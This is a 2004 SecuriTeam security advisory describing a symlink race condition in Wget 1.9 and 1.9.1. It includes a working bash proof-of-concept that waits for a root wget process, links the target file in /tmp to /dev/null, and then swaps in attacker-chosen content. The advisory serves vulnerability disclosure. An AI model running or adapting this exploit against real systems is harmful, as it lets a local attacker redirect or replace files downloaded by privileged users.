[UNIX] Wget Race Condition Vulnerability Allows a Symlink Attack
From: SecuriTeam (support_at_securiteam.com)
Date: 05/18/04
- Previous message: SecuriTeam: "[UNIX] TTT-C Multiple Cross-Site Scripting"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 18 May 2004 19:05:50 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Wget Race Condition Vulnerability Allows a Symlink Attack
------------------------------------------------------------------------
SUMMARY
" <http://www.gnu.org/directory/wget.html> Wget is a network utility to
retrieve files from the Web using http and ftp, the two most widely used
Internet protocols. It works non-interactively, so it will work in the
background, after having logged off. The program supports recursive
retrieval of web-authoring pages as well as ftp sites you can use wget to
make mirrors of archives and home pages or to travel the Web like a WWW
robot."
It is possible to create a symbolic link attack on wget when retrieving
files, which will result in a file written in a completely different
location than intended.
DETAILS
Vulnerable Systems:
* Wget versions 1.9, 1.9.1, possibly prior
Wget checks for the presence of a file with the same name as the one
invoked at the command line. If the file exists, it saves the downloaded
file under a different name. The problem stems from not locking the file
prior to writing to it, which allows an attacker to create a symbolic link
from the file to another file before wget is writing it, thereby diverting
the output to anywhere desired (on world writeable directories naturally).
An example of an attack sequence:
* Wget process starts
* File checking (but not locking!)
* Attacker creates a symlink
* Wget writes to the wrong place
Exploit:
A proof-of-concept script is provided that can be used in the following
manner:
* Open a shell and execute wget_race.sh with user A
* Open another shell and with root user launch wget from /tmp:
wget http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.26.bz2
* Check the content of /tmp/patch-2.4.26.bz2
#!/bin/bash
rm -f salida.txt pid.txt *.wget /tmp/patch-2.4.26.bz2
echo "1">salida.txt
a=`cat salida.txt`
echo "Waiting for Wget execution..."
while [ "$a" == 1 ]
do
ps auxw|grep wget|grep patch-2.4.26.bz2>>salida.txt
a=`cat salida.txt`
done
echo "Process catched!"
pgrep -u root wget>pid.txt
ln -s /dev/null /tmp/patch-2.4.26.bz2
echo "/dev/null link created!"
echo "Waiting for downloading to finish..."
b=`pgrep -u root wget`
touch $b.wget
c=1
while [ "$c" == 1 ]
do
if [ -e .wget ]
then
c=0
echo "Downloading finished! Let's delete the original file, and put
our trojaned file :-)"
rm -f /tmp/patch-2.4.26.bz2
echo "Surprise!">/tmp/patch-2.4.26.bz2
echo "Does it worked "
ls -la /tmp/patch-2.4.26.bz2
else
b=`pgrep -u root wget`
touch $b.wget
fi
done
ADDITIONAL INFORMATION
The information has been provided by
<mailto:overclocking_a_la_abuela@hotmail.com> ugo "VXzquez" CaramXs.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] TTT-C Multiple Cross-Site Scripting"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
